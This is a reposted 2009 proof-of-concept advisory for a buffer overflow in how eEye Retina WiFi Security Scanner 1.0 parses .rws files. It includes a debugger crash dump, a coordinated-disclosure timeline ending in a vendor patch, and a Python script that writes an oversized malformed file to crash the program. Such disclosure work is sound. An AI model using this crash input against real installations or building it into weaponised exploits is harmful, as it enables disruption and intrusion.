首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC
来源:http://www.zeroscience.org 作者:LiquidWorm 发布时间:2009-07-13  

#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
# * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401      test    byte ptr [eax+esi+4],1     ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll -
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02            mov     al,byte ptr [edx]          ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
#   of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
#   from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
#   progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
#   because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
#   from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
#   time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
#   the QA. The fix will be introduced in the next release of the product. Scheduled
#   date for the release of the update is not yet known...or...it's unknown  :) .
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
#   of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# *   fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# *   on 10th of july because of internal company reasons.
# * [10.07.2009] Vendor releases patch: http://download.eeye.com/html/products/retinawireless/
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d.  :)
#
#
# * Proof Of Concept:
#


#=========================================*snip*=========================================#


header = (
  "\x52\x57\x53"
  "\x30\x31\x30"
  "\x19\x52\x76"
  "\x00"
  )

buffer = "\x41" * 1574624 #[Bytes/chars]
    #1574622 No issues
    #1574623 BoF, Access violation when reading [random]
    #1574624 BoF, Access violation when reading [414141B1]
    #...

payload = header + buffer

file = "Abulia.rws"

filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()

print "\n[+] File " + file + " successfully landed.\n"


#=========================================*snip*=========================================#

 


#################################################################################
#          #
# * Disclaimer:         #
#          #
# * This  document and all the information it contains are provided "as is", #
# * for educational purposes only, without warranty of any kind, whether #
# * express or implied.        #
#          #
# * The  author reserves the right not to be responsible for the topicality, #
# * correctness, completeness or quality of the information provided in  #
# * this document. Liability claims regarding damage caused by the use of #
# * any information provided, including any kind of information which is #
# * incomplete or incorrect, will therefore be rejected.   #
#          #
#################################################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OtsAv DJ/TV/Radio Multiple Loc
·AwingSoft Web3D Player (WindsP
·ToyLog 0.1 SQL Injection Vulne
·Linux/x86 Port Binding Shellco
·MS Internet Explorer 7 Video A
·Morcego CMS <= 1.7.6 Remote Bl
·Photo DVD Maker Pro <= 8.02 (.
·M3U/M3L to ASX/WPL 1.1 (ASX,M
·PatPlayer 3.9 (M3U File) Local
·Playlistmaker 1.5 (.M3U/M3L/T
·Microsoft Internet Explorer (A
·d.net CMS Arbitrary Reinstall/
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved